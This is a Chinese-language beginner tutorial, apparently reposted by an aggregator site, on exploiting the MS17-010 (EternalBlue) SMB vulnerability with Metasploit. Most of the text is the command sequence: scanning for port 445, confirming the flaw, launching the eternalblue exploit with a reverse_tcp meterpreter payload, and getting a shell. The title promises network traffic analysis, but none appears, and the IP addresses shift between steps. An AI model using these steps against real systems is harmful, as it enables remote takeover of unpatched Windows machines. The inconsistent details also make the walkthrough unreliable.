小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析

小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析,第1张

概述介绍《小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析》开发教程,希望对您有用。

《小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析》要点:
本文介绍了小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析,希望对您有用。如果有疑问,可以联系我们。

攻击机:192.168.11.231

被攻击机:192.168.11.22

第一步:更新MSF:msfupdate,查找smb_ms17_010.rb模块

cd /usr/share/Metasploit-framework/modules/auxiliary/scanner/smb

第二步:连接postgresql数据库,不连接的话扫描的信息的信息无法入库.连接上后可通过db_status查看状态

启动数据库:service postgresql start

启动msfconsole:msfconsole

使用db_status确认数据库是否正确连接

第三步:运行smb模块探测主机445端口开放情况.

use auxiliary/scanner/smb/smb_version

set rhosts 192.168.236.129/24

set threads 16

run

扫描完成后,扫描的信息会自动存入数据库,可通过hosts命令查看

第四步:使用smb_ms17_010模块探测MS17-010漏洞

use auxiliary/scanner/smb/smb_ms17_010

show options

set threads 16

services -r tcp -p 445 -R

run

扫描之前可通过info查看配置详情

第五步:使用攻击模块

use exploit/windows/smb/ms17_010_eternalblue

设置目标系统的IP和payload.

set RHOST 192.168.142.128

set payload windows/x64/meterpreter/reverse_tcp

set LHOST 192.168.142.133

exploit执行攻击,胜利返回会话.

第六步:坐等结果

meterpreter> sysinfo

meterpreter> getuID

MS17-010扫描模块截图

MS17-010攻击模块截图

攻击胜利,得到SHELL!!!

欢迎参与《小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析》讨论,分享您的想法,内存溢出PHP学院为您提供专业教程。

总结

以上是内存溢出为你收集整理的小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析全部内容,希望文章能够帮你解决小白入门-新手学习-网络基础-ms17-010-永恒之蓝漏洞-步骤-拿SHELL-网络流量分析所遇到的程序开发问题。

如果觉得内存溢出网站内容还不错,欢迎将内存溢出网站推荐给程序员好友。

欢迎分享,转载请注明来源:内存溢出

原文地址: http://outofmemory.cn/sjk/1182773.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-06-02
下一篇 2022-06-02

发表评论

登录后才能评论

评论列表(0条)

保存